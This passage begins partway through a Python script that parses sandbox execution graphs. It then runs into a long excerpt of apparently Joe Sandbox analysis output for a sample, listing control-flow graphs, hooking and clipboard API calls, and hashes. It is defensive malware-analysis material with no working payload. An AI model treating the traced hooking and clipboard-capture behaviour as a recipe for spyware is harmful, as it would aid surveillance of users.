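    name, nodes, edges, current = tokens[0], {}, [], None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                      # edge: annotations never follow an edge
            src, dst = tok.split("->")
            edges.append((int(src), int(dst)))
            current = None
            i += 1
        elif ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)               # node definition: id + address
            nodes[current] = {"addr": tokens[i + 1], "annot": []}
            i += 2
        else:                                # anything else annotates the open node
            if current is not None:
                nodes[current]["annot"].append(tok)
            i += 1
    return name, nodes, edges


def api_calls(nodes):
    """Map each Win32 API name found in annotations to the sorted addresses that call it."""
    seen = defaultdict(set)
    for info in nodes.values():
        for tok in info["annot"]:
            if API_RE.match(tok):
                seen[tok].add(info["addr"])
    return {api: sorted(addrs) for api, addrs in seen.items()}


def call_chains(nodes, edges, api):
    """Address paths from every entry node (no predecessors) to nodes annotated with `api`."""
    succ, has_pred = defaultdict(list), set()
    for src, dst in edges:
        if src in nodes and dst in nodes:    # ignore edges into nodes a trimmed dump lacks
            succ[src].append(dst)
            has_pred.add(dst)
    targets = {n for n, info in nodes.items() if api in info["annot"]}
    chains = []
    for entry in (n for n in nodes if n not in has_pred):
        parent, queue = {entry: None}, deque([entry])
        while queue:                         # BFS gives the shortest chain per entry
            cur = queue.popleft()
            for nxt in succ[cur]:
                if nxt not in parent:
                    parent[nxt] = cur
                    queue.append(nxt)
        for target in targets & parent.keys():
            path, n = [], target
            while n is not None:
                path.append(nodes[n]["addr"])
                n = parent[n]
            chains.append(path[::-1])
    return sorted(chains)


def callees(nodes):
    """Targets of 'call <addr>' annotations in a control-flow graph (direct callees of the function)."""
    out = set()
    for info in nodes.values():
        a = info["annot"]
        out.update(a[i + 1] for i in range(len(a) - 1) if a[i] == "call")
    return sorted(out)


if __name__ == "__main__":
    _, nodes, edges = parse_graph(EXEC_EXCERPT)
    for api, addrs in sorted(api_calls(nodes).items()):
        print(api, addrs, call_chains(nodes, edges, api))
    _, cfg, _ = parse_graph(CFG_EXCERPT)
    print("f64828 calls:", callees(cfg))
```

Feed the whole `execution_graph` line from the report to `parse_graph` and `call_chains(nodes, edges, "SetWindowsHookExA")` returns the address path from the entry node to the hook installation, which is the function to open first in the memory dump; `api_calls` gives the same API-to-address table for `OleGetClipboard`, `CreateWindowExW`, `DuplicateHandle` and `KiUserCallbackDispatcher`. The `call` annotations of a control-flow graph are a different level (basic blocks inside one function, `callees` lists the functions it calls directly), but the token syntax is identical, so one parser serves both.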
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2dd41ac5e9d32c5fbd10c57fa0a1e6ad36541277ffbea6223a78d4e76d8c2a91
                                • Instruction ID: 4eb9a9afdc7942666f4d85380e38e6f86ff9bdda8c0aaad1322c0fc4734463b9
                                • Opcode Fuzzy Hash: 2dd41ac5e9d32c5fbd10c57fa0a1e6ad36541277ffbea6223a78d4e76d8c2a91
                                • Instruction Fuzzy Hash: BC53F831D10B1A8ACB51EF68C8805A9F7B1FF99310F15D79AE4587B121FB70AAD4CB81
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad7565ec42ebc1cc4310b5bcae344a36b4eb8bfb496d30b9513ca734f9e2c8b5
                                • Instruction ID: df34dfd5e364697487e3a38c268a59724c5bd6a7461b6552cdf1af18c2e67d45
                                • Opcode Fuzzy Hash: ad7565ec42ebc1cc4310b5bcae344a36b4eb8bfb496d30b9513ca734f9e2c8b5
                                • Instruction Fuzzy Hash: 19333F31D10B198EDB11EF68C8846ADF7B1FF99300F15C79AE459A7211EB70AAC5CB81
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek
                                • API String ID: 0-172235318
                                • Opcode ID: 43825d001067599e8bc38e491b1483ca7ae6a380cc612a17176f79bff39012b2
                                • Instruction ID: 6f64dda1f0efbfce0a021086df4d4e8c9dd2f50368ac46f826a3038ac5c2f2d0
                                • Opcode Fuzzy Hash: 43825d001067599e8bc38e491b1483ca7ae6a380cc612a17176f79bff39012b2
                                • Instruction Fuzzy Hash: A091AD70E00309DFDF14DFA9D8817DEBBF2AF89714F248129E414AB294DB749885DB91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37f8b9aad96185942f5c3c26fd567ee31eb44c8d8e897c018f1b2584a885aa5d
                                • Instruction ID: 354ae754f607ac93f123127388ba2bb7645553d0adcf90c0938f6ca306f9e6df
                                • Opcode Fuzzy Hash: 37f8b9aad96185942f5c3c26fd567ee31eb44c8d8e897c018f1b2584a885aa5d
                                • Instruction Fuzzy Hash: 31B16D70E00209CFDF10DFA9D88579EBBF2AF88714F148529D815E7394EB74A885EB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 570 f64828-f648b4 573 f648b6-f648c1 570->573 574 f648fe-f64900 570->574 573->574 575 f648c3-f648cf 573->575 576 f64902-f6491a 574->576 577 f648f2-f648fc 575->577 578 f648d1-f648db 575->578 583 f64964-f64966 576->583 584 f6491c-f64927 576->584 577->576 579 f648df-f648ee 578->579 580 f648dd 578->580 579->579 582 f648f0 579->582 580->579 582->577 585 f64968-f649ad 583->585 584->583 586 f64929-f64935 584->586 594 f649b3-f649c1 585->594 587 f64937-f64941 586->587 588 f64958-f64962 586->588 589 f64945-f64954 587->589 590 f64943 587->590 588->585 589->589 592 f64956 589->592 590->589 592->588 595 f649c3-f649c9 594->595 596 f649ca-f64a27 594->596 595->596 603 f64a37-f64a3b 596->603 604 f64a29-f64a2d 596->604 606 f64a3d-f64a41 603->606 607 f64a4b-f64a4f 603->607 604->603 605 f64a2f-f64a32 call f60ab8 604->605 605->603 606->607 611 f64a43-f64a46 call f60ab8 606->611 608 f64a51-f64a55 607->608 609 f64a5f-f64a63 607->609 608->609 613 f64a57 608->613 614 f64a65-f64a69 609->614 615 f64a73 609->615 611->607 613->609 614->615 616 f64a6b 614->616 617 f64a74 615->617 616->615 617->617
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: 8c976366553f8f094c41fdbb6a5b0377e0f993cfdeede58a6cc80d436d340522
                                • Instruction ID: 0f4b2c86ebe2d74af86534e7c0a835fc05b6eef7c29191d329c57250d98d8671
                                • Opcode Fuzzy Hash: 8c976366553f8f094c41fdbb6a5b0377e0f993cfdeede58a6cc80d436d340522
                                • Instruction Fuzzy Hash: 73717BB0E00349DFDF14EFA9C88579EBBF2AF88714F148129E414A7294DB78A841DF95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 522 f6481c-f648b4 525 f648b6-f648c1 522->525 526 f648fe-f64900 522->526 525->526 527 f648c3-f648cf 525->527 528 f64902-f6491a 526->528 529 f648f2-f648fc 527->529 530 f648d1-f648db 527->530 535 f64964-f64966 528->535 536 f6491c-f64927 528->536 529->528 531 f648df-f648ee 530->531 532 f648dd 530->532 531->531 534 f648f0 531->534 532->531 534->529 537 f64968-f6497a 535->537 536->535 538 f64929-f64935 536->538 545 f64981-f649ad 537->545 539 f64937-f64941 538->539 540 f64958-f64962 538->540 541 f64945-f64954 539->541 542 f64943 539->542 540->537 541->541 544 f64956 541->544 542->541 544->540 546 f649b3-f649c1 545->546 547 f649c3-f649c9 546->547 548 f649ca-f64a27 546->548 547->548 555 f64a37-f64a3b 548->555 556 f64a29-f64a2d 548->556 558 f64a3d-f64a41 555->558 559 f64a4b-f64a4f 555->559 556->555 557 f64a2f-f64a32 call f60ab8 556->557 557->555 558->559 563 f64a43-f64a46 call f60ab8 558->563 560 f64a51-f64a55 559->560 561 f64a5f-f64a63 559->561 560->561 565 f64a57 560->565 566 f64a65-f64a69 561->566 567 f64a73 561->567 563->559 565->561 566->567 568 f64a6b 566->568 569 f64a74 567->569 568->567 569->569
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1547875704.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f60000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: \Vek$\Vek
                                • API String ID: 0-1171950776
                                • Opcode ID: d779f8234917e5e6634a5d048259ba87cdd9f46a767312b0d8a1392ab6b11720
                                • Instruction ID: f4f9f79f3627a50cdef8a517a74e4a340633d1c4f9354c1a306d36e5ab15d0ea
                                • Opcode Fuzzy Hash: d779f8234917e5e6634a5d048259ba87cdd9f46a767312b0d8a1392ab6b11720
                                • Instruction Fuzzy Hash: CC7189B0E00349DFDF10EFA8C8857DEBBF2AF89714F148129E414AB254DB78A841DB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1057 5e1896e-5e189de 1059 5e189e0-5e189e6 1057->1059 1060 5e189e9-5e189f0 1057->1060 1059->1060 1061 5e189f2-5e189f8 1060->1061 1062 5e189fb-5e18a33 1060->1062 1061->1062 1063 5e18a3b-5e18a9a CreateWindowExW 1062->1063 1064 5e18aa3-5e18adb 1063->1064 1065 5e18a9c-5e18aa2 1063->1065 1069 5e18ae8 1064->1069 1070 5e18add-5e18ae0 1064->1070 1065->1064 1071 5e18ae9 1069->1071 1070->1069 1071->1071
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E18A8A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 36d583c1058c80909ceab8f1a7f1bdb2c50a54ac7dd5d1167ad59f178c14da20
                                • Instruction ID: d734f1155f9f5d455149450e31f707351bd5d9b652e638fdf0cb5e78fcfbb83b
                                • Opcode Fuzzy Hash: 36d583c1058c80909ceab8f1a7f1bdb2c50a54ac7dd5d1167ad59f178c14da20
                                • Instruction Fuzzy Hash: 4751B0B1D043489FDB14CF9AD884ADEBFB5FF48314F24822AE819AB210D775A845CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1072 5e18978-5e189de 1073 5e189e0-5e189e6 1072->1073 1074 5e189e9-5e189f0 1072->1074 1073->1074 1075 5e189f2-5e189f8 1074->1075 1076 5e189fb-5e18a9a CreateWindowExW 1074->1076 1075->1076 1078 5e18aa3-5e18adb 1076->1078 1079 5e18a9c-5e18aa2 1076->1079 1083 5e18ae8 1078->1083 1084 5e18add-5e18ae0 1078->1084 1079->1078 1085 5e18ae9 1083->1085 1084->1083 1085->1085
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E18A8A
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: de6ebd58f71edce0ce452176fae7a28523cdbd488a732819c66beb866866d104
                                • Instruction ID: 8276618c01faf1d9cd227b9f84e98949ef31513c7fe9236dd98dbc93cee38952
                                • Opcode Fuzzy Hash: de6ebd58f71edce0ce452176fae7a28523cdbd488a732819c66beb866866d104
                                • Instruction Fuzzy Hash: 8B41CEB1D04348DFDB14CF9AD884ADEBBB5BF48314F24822AE819AB210D7759885CF94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1086 5e1c28c-5e1d5a4 1091 5e1d654-5e1d674 call 5e16c24 1086->1091 1092 5e1d5aa-5e1d5af 1086->1092 1099 5e1d677-5e1d684 1091->1099 1094 5e1d5b1-5e1d5e8 1092->1094 1095 5e1d602-5e1d63a CallWindowProcW 1092->1095 1102 5e1d5f1-5e1d600 1094->1102 1103 5e1d5ea-5e1d5f0 1094->1103 1096 5e1d643-5e1d652 1095->1096 1097 5e1d63c-5e1d642 1095->1097 1096->1099 1097->1096 1102->1099 1103->1102
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E1D629
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 05324d0fdf1a5d40f96d99b0653d6e736d89db59330b98c23faa4cf5f9efad8c
                                • Instruction ID: 60227d70825da3ca533d6a10f155fbb2704f27d256e855fd8b39578f458969b6
                                • Opcode Fuzzy Hash: 05324d0fdf1a5d40f96d99b0653d6e736d89db59330b98c23faa4cf5f9efad8c
                                • Instruction Fuzzy Hash: A8415BB4A00349CFDB14CF89C988BAABBF5FF88314F248459D459AB321D775A841CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1105 5e1e2ac-5e1e2ae 1106 5e1e2b0-5e1e2b3 1105->1106 1107 5e1e2b5-5e1e2b6 1105->1107 1106->1107 1108 5e1e2b8-5e1e2bc 1107->1108 1109 5e1e2bd-5e1e308 1107->1109 1108->1109 1110 5e1e312-5e1e350 OleGetClipboard 1109->1110 1111 5e1e352-5e1e358 1110->1111 1112 5e1e359-5e1e3a7 1110->1112 1111->1112 1117 5e1e3b7 1112->1117 1118 5e1e3a9-5e1e3ad 1112->1118 1120 5e1e3b8 1117->1120 1118->1117 1119 5e1e3af 1118->1119 1119->1117 1120->1120
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: c2f9da6c5afbd0a106c33a7fa9d4eea699586f1b996e45938299e6ca5bf6976c
                                • Instruction ID: 406f0f9428e789b58f5b0f3f84aabd726417c23707cc437e216a2d7f372411b5
                                • Opcode Fuzzy Hash: c2f9da6c5afbd0a106c33a7fa9d4eea699586f1b996e45938299e6ca5bf6976c
                                • Instruction Fuzzy Hash: 4E31E2B0901348DFDB10CF99C985BCEBBF5BB48304F249029E845BB390D7B59845CB65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1121 5e1dca8-5e1e350 OleGetClipboard 1125 5e1e352-5e1e358 1121->1125 1126 5e1e359-5e1e3a7 1121->1126 1125->1126 1131 5e1e3b7 1126->1131 1132 5e1e3a9-5e1e3ad 1126->1132 1134 5e1e3b8 1131->1134 1132->1131 1133 5e1e3af 1132->1133 1133->1131 1134->1134
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Clipboard
                                • String ID:
                                • API String ID: 220874293-0
                                • Opcode ID: 98b00fb1185ee872295330e7890442aeae7358f94a2bbf69e9cdb24d433a0048
                                • Instruction ID: 9ac745abaf1190a39d70075e605fd20fa1b1bc443ddc94ef2f3cab2362bc1276
                                • Opcode Fuzzy Hash: 98b00fb1185ee872295330e7890442aeae7358f94a2bbf69e9cdb24d433a0048
                                • Instruction Fuzzy Hash: E231E2B0901348DFDB14CF99C945BDEBBF5BB48304F248029E845BB390DBB59845CB95

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1135 5e1c2ba-5e1c2bb 1136 5e1c2c2-5e1c2d2 1135->1136 1137 5e1c2bd 1135->1137 1139 5e1c2d4-5e1c2d6 1136->1139 1140 5e1c2d9-5e1c2e2 1136->1140 1137->1136 1139->1140 1141 5e1c2e4 1140->1141 1142 5e1c2e9-5e1d8e1 1140->1142 1141->1142 1145 5e1d8e9-5e1d914 KiUserCallbackDispatcher 1142->1145 1146 5e1d916-5e1d91c 1145->1146 1147 5e1d91d-5e1d931 1145->1147 1146->1147
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 8c11b90411bde95b1127be34d19b13abe7af67fdbf1c37ceec493d6b1142f067
                                • Instruction ID: 24cb1a61c73040c76737f4089583ee4e3d809bc3f6fa672a16a63c573153303c
                                • Opcode Fuzzy Hash: 8c11b90411bde95b1127be34d19b13abe7af67fdbf1c37ceec493d6b1142f067
                                • Instruction Fuzzy Hash: C921D0B1808388CFDB11DF99D8847DEBFF4EF0A214F14509AD899EB252D6745804CBE9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1149 5e1c6d0-5e1c76c DuplicateHandle 1150 5e1c775-5e1c792 1149->1150 1151 5e1c76e-5e1c774 1149->1151 1151->1150
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ee833fb9d3de8fb477181401d43aab1c33de3c44c6210ded2015a20827574217
                                • Instruction ID: 4969fa4070a4ef0a37188e604c3a14be8eb0564bb50285c1d510cd9b0fbc3d6e
                                • Opcode Fuzzy Hash: ee833fb9d3de8fb477181401d43aab1c33de3c44c6210ded2015a20827574217
                                • Instruction Fuzzy Hash: 6E21E4B5900348DFDB10CFA9D488AEEBBF5FB48310F24846AE958A3351D374A944CF64

                                Control-flow Graph
                                • 5e1c6d8-5e1c76c (calls DuplicateHandle) -> 5e1c775-5e1c792
                                • 5e1c6d8-5e1c76c (calls DuplicateHandle) -> 5e1c76e-5e1c774
                                • 5e1c76e-5e1c774 -> 5e1c775-5e1c792
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E1C75F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 322e7aed6a3c613eb9854a55e056a82c92ca44ceeee9c4a9c16aca41812e4c4e
                                • Instruction ID: a35b37c2b6e6b811b6ea3a8208e3c8b2b926b1c770d0dcca432cdda528c1bd8f
                                • Opcode Fuzzy Hash: 322e7aed6a3c613eb9854a55e056a82c92ca44ceeee9c4a9c16aca41812e4c4e
                                • Instruction Fuzzy Hash: 2B21C4B5900348DFDB10CFAAD584ADEBBF4FB48310F14842AE958A7350D375A954CF65

                                Control-flow Graph
                                • 5e1fe03-5e1fe52 -> 5e1fe54-5e1fe5c
                                • 5e1fe03-5e1fe52 -> 5e1fe5e-5e1fe90 (calls SetWindowsHookExA)
                                • 5e1fe54-5e1fe5c -> 5e1fe5e-5e1fe90 (calls SetWindowsHookExA)
                                • 5e1fe5e-5e1fe90 (calls SetWindowsHookExA) -> 5e1fe92-5e1fe98
                                • 5e1fe5e-5e1fe90 (calls SetWindowsHookExA) -> 5e1fe99-5e1feb9
                                • 5e1fe92-5e1fe98 -> 5e1fe99-5e1feb9
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 05E1FE83
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: 3866b9630af1ec5114c8f813076f5ae197e01a6d595d9b3b51f7282ad192f692
                                • Instruction ID: 55bc577bfe257dd517c7e475a38f35b4bf7e466904c261e0ba53ef558b3f64ee
                                • Opcode Fuzzy Hash: 3866b9630af1ec5114c8f813076f5ae197e01a6d595d9b3b51f7282ad192f692
                                • Instruction Fuzzy Hash: 672147B59002099FDB10CF9AC844BEEFBF5FB88320F10842AD459A7250C775A944CFA5

                                Control-flow Graph
                                • 5e1fe08-5e1fe52 -> 5e1fe54-5e1fe5c
                                • 5e1fe08-5e1fe52 -> 5e1fe5e-5e1fe90 (calls SetWindowsHookExA)
                                • 5e1fe54-5e1fe5c -> 5e1fe5e-5e1fe90 (calls SetWindowsHookExA)
                                • 5e1fe5e-5e1fe90 (calls SetWindowsHookExA) -> 5e1fe92-5e1fe98
                                • 5e1fe5e-5e1fe90 (calls SetWindowsHookExA) -> 5e1fe99-5e1feb9
                                • 5e1fe92-5e1fe98 -> 5e1fe99-5e1feb9
                                APIs
                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 05E1FE83
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HookWindows
                                • String ID:
                                • API String ID: 2559412058-0
                                • Opcode ID: d2fdb6d9403362968530ce69c3967204f3835bcc59e2ffaeb012003e569cc98b
                                • Instruction ID: ad280ae034525253c93100f7d3c9b9c9ec6e837ef197c9246e644dca58934851
                                • Opcode Fuzzy Hash: d2fdb6d9403362968530ce69c3967204f3835bcc59e2ffaeb012003e569cc98b
                                • Instruction Fuzzy Hash: AD2138B5D002499FDB14CF9AD844BEEFBF5FB88320F10842AD459A7250C775A944CFA5

                                Control-flow Graph
                                • 5e15e3c-5e17910 -> 5e17912-5e17915
                                • 5e15e3c-5e17910 -> 5e17918-5e17943 (calls GetModuleHandleW)
                                • 5e17912-5e17915 -> 5e17918-5e17943 (calls GetModuleHandleW)
                                • 5e17918-5e17943 (calls GetModuleHandleW) -> 5e17945-5e1794b
                                • 5e17918-5e17943 (calls GetModuleHandleW) -> 5e1794c-5e17960
                                • 5e17945-5e1794b -> 5e1794c-5e17960
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 05E17936
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 05e67d24134aeac0d22eaa2591e69dbc29648bed3f551d687ae6d9d70bfd930f
                                • Instruction ID: 1497c9eb3fb2b0271ce6887ad8fdbce3a4971d8dfbacbdebe1e94de939c5efb0
                                • Opcode Fuzzy Hash: 05e67d24134aeac0d22eaa2591e69dbc29648bed3f551d687ae6d9d70bfd930f
                                • Instruction Fuzzy Hash: 601120B18006488FDB10CF9AC444BDEFBF4EB48624F10842AD89AB7200C375A549CFA5

                                Control-flow Graph
                                • 5e178ca-5e17910 -> 5e17912-5e17915
                                • 5e178ca-5e17910 -> 5e17918-5e17943 (calls GetModuleHandleW)
                                • 5e17912-5e17915 -> 5e17918-5e17943 (calls GetModuleHandleW)
                                • 5e17918-5e17943 (calls GetModuleHandleW) -> 5e17945-5e1794b
                                • 5e17918-5e17943 (calls GetModuleHandleW) -> 5e1794c-5e17960
                                • 5e17945-5e1794b -> 5e1794c-5e17960
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 05E17936
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 77a7507dd067adba04ed132ed9bbee63bf9d0f8c154db4c405c06f1e6adb48c0
                                • Instruction ID: f12443c09b5f786596c5b3b82af3b8f580e8010dc89e1be3a52fa559c94ffb89
                                • Opcode Fuzzy Hash: 77a7507dd067adba04ed132ed9bbee63bf9d0f8c154db4c405c06f1e6adb48c0
                                • Instruction Fuzzy Hash: 301102B5C006498FDB10CF9AC844BDEFBF4EB88624F15842AD869B7210C375A549CFA5

                                Control-flow Graph
                                • 5e1c2e4-5e1d914 (calls KiUserCallbackDispatcher) -> 5e1d916-5e1d91c
                                • 5e1c2e4-5e1d914 (calls KiUserCallbackDispatcher) -> 5e1d91d-5e1d931
                                • 5e1d916-5e1d91c -> 5e1d91d-5e1d931
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,05E1D87D), ref: 05E1D907
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 6328b0237250a049f42c2c63cf21ba2e3bd6d8c0087e391fe7d17d7fb00b7b54
                                • Instruction ID: 4d0cb74e90ac94f84f95b3416c99dd194386b642cc033cc2ee34667e8efc8b61
                                • Opcode Fuzzy Hash: 6328b0237250a049f42c2c63cf21ba2e3bd6d8c0087e391fe7d17d7fb00b7b54
                                • Instruction Fuzzy Hash: 2B1136B1800348CFDB10DF9AD584BDEBBF4EB48314F20842AD959A7250C3B4A944CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 05E1E1C5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 87d82b0aa9a69897edfadd4e3a78083087aa323c4b6e04e05be2556dc063ee04
                                • Instruction ID: 8552b52ef7b40285b1aedcd34ef1eab2b76e3975d327e55a7b9f7a5a841f876b
                                • Opcode Fuzzy Hash: 87d82b0aa9a69897edfadd4e3a78083087aa323c4b6e04e05be2556dc063ee04
                                • Instruction Fuzzy Hash: D91148B4900348CFCB10CF9AC449BDEBFF8EB48314F108429E959A7200C375A544CFA5
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 05E1E1C5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1550190752.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_5e10000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 57e855735e5db0a7887597ff0865538c2f44733ea9a5d983a1b9d3624c652977
                                • Instruction ID: 8bbc2240ab436a8317b12fe1a77fce46d44f80116cb7f07e0e7eb3e9c70dae2b
                                • Opcode Fuzzy Hash: 57e855735e5db0a7887597ff0865538c2f44733ea9a5d983a1b9d3624c652977
